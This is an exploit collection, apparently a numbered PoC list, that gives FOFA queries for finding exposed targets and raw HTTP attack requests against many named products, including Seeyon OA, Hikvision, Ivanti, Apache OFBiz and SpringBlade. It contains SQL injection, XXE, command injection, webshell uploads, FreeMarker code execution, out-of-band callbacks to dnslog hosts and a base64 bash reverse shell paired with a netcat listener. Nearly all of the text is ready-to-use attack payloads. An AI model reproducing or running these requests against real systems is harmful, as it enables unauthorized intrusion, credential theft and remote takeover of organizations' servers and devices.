GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 1670

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin (奇安信) Wangshen SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Replace the placeholder in the PoC above with the generated payload:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML file:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth:替换为自己的
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
